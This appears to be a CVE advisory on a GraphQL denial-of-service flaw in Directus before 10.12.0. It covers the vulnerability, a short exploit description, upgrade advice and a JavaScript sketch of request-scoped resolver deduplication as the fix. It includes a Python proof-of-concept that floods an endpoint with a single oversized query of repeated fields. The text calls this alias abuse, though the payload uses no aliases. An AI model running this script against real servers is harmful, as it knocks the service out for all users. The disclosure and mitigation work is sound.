The vulnerability resides in Directus’ GraphQL endpoints `/graphql` and `/graphql/system`, which failed to deduplicate resolver invocations within a single request. An authenticated attacker could abuse GraphQL’s aliasing feature to repeat an expensive relational query many times in a single request. This forced the server to execute a large number of independent complex database queries concurrently, multiplying the database load linearly with the number of aliases. The existing token limit on GraphQL queries was not restrictive enough to prevent this, and the relational depth limit applied per alias but did not reduce the total number of queries executed. Since rate limiting is disabled by default, there was no built-in throttle to stop this from exhausting CPU, memory, and I/O resources, potentially degrading or crashing the service. Importantly, any authenticated user, even those with minimal read-only permissions, could trigger this condition. The attack scales linearly with the number of aliases and relational depth, and concurrency exacerbates the effect. This results in a denial-of-service (DoS) scenario where the server becomes unresponsive, affecting all users.
DailyCVE Form
Platform: Directus API
Version: before 10.12.0
Vulnerability: GraphQL Field Duplication
Severity: Medium (6.5)
Date: 2024-07-08
Prediction: 2024-07-08 (Fixed)
What Undercode Say:
Proof of Concept (PoC) script to demonstrate the vulnerability:

```python
import requests

url = 'http://0.0.0.0:8055/graphql'
auth_token = 'YOUR_AUTH_TOKEN'
headers = {'Content-Type': 'application/json', 'Authorization': f'Bearer {auth_token}'}

# Create a payload with many aliases: 200 `max { ... }` blocks, each selecting `id` 200 times
id_payload = 'id ' * 200
max_payload = 'max {' + id_payload + '} '
full_payload = max_payload * 200
data = {'query': 'query { query_name: collection_name_aggregated { ' + full_payload + ' } }'}

# Send the single oversized request and print the server's response
response = requests.post(url, headers=headers, json=data)
print(response.json())
```
Exploit:
An attacker sends a crafted GraphQL query with a large number of aliases for the same field, such as max {id id id ...}. This causes the server to execute numerous identical resolver functions, consuming excessive resources and leading to a denial of service.
Protection from this CVE
Upgrade to Directus version 10.12.0 or later, which introduces request-scoped resolver deduplication. This ensures that multiple aliases invoking the same resolver with identical arguments only execute once per request, sharing the result.
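The following is an added illustration of the mitigation class described above (request-scoped resolver deduplication); it is constructed for this write-up and is not Directus code. It assumes a per-request `resolverCache` Map on the GraphQL context and a constructed stand-in database that counts how many queries actually run, so 200 aliases of the same `max { id }` selection cost one query with deduplication and 200 without.

```javascript
// Constructed example, not Directus code: request-scoped resolver deduplication.
// Within one request, resolver calls with the same name and canonical arguments
// share a single in-flight promise, so N aliases of `max { id }` cost one query.

// Canonical, key-order-independent serialisation of resolver arguments.
function canonical(value) {
  if (Array.isArray(value)) return `[${value.map(canonical).join(',')}]`;
  if (value !== null && typeof value === 'object') {
    const body = Object.keys(value).sort()
      .map((k) => `${JSON.stringify(k)}:${canonical(value[k])}`).join(',');
    return `{${body}}`;
  }
  return JSON.stringify(value);
}

// Wrap a resolver; `context.resolverCache` is a Map created once per request.
function dedupe(name, resolver) {
  return (parent, args, context, info) => {
    const cache = context.resolverCache;
    if (!cache) return resolver(parent, args, context, info); // dedup disabled
    const key = `${name}:${canonical(args)}`;
    if (!cache.has(key)) {
      cache.set(key, Promise.resolve(resolver(parent, args, context, info)));
    }
    return cache.get(key); // every alias awaits the same promise
  };
}

// Constructed stand-in for the database: counts how many queries really run.
function makeFakeDb() {
  const db = { queries: 0 };
  db.aggregateMax = async (collection, field) => {
    db.queries += 1;
    return { [field]: 42 }; // constructed result value
  };
  return db;
}

// Simulate one request whose GraphQL document holds `aliasCount` aliases of
// the same `max { id }` selection. Returns how many DB queries actually ran.
async function simulateRequest(aliasCount, dedupeEnabled) {
  const db = makeFakeDb();
  const context = { db, resolverCache: dedupeEnabled ? new Map() : null };
  const maxResolver = dedupe('aggregated.max',
    (_parent, a, ctx) => ctx.db.aggregateMax(a.collection, a.field));
  const args = { collection: 'articles', field: 'id' }; // constructed arguments
  const results = await Promise.all(Array.from({ length: aliasCount },
    () => maxResolver(null, args, context, null)));
  return { dbQueries: db.queries, resolved: results.length, value: results[0].id };
}
```

Note that the cache lives on the request context and is discarded when the request finishes, so results are never shared across users or requests; deduplication only collapses identical resolver calls inside one document.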
Impact:
- Service degradation or outage due to exhausted database connection pools and server resources.
- Low-privilege requirement: any authenticated user, including read-only accounts, can exploit this.
- Linear scaling of impact with the number of aliases and relational depth.
- Amplified effect when multiple malicious requests are sent concurrently.
Sources:
Reported By: github.com